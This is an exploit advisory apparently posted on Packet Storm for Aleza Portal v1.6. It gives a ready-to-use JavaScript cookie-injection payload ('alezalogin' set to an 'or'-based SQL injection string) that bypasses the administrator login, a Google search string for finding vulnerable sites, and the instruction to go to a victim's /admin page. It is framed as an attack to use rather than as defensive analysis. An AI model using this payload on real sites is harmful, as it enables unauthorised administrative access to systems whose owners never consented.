Aleza Portal version 1.6 suffers from an insecure cookie handling vulnerability that allows for SQL injection.
a95f06d8fa58fb952b1208409090aa5f0b7810e7d7346b1d7177e46aeeba780aAleza Portal v1.6 - Insecure (SQLi) Cookie Handling
=========================================================
~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Aleza Portal v1.6
~Software: http://www.webavail.com/
-Demo : http://www.webavail.com/alezademo/
~Vulnerability Style : (SQLi) Cookie Handling
~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
Browser Injection for handling() by Javascript-SQLi Codes
================================
javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
================================
[+] Exploitable Browser Injected!
[+] Go to : http://[Victim]/admin
GoodLucK ;)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed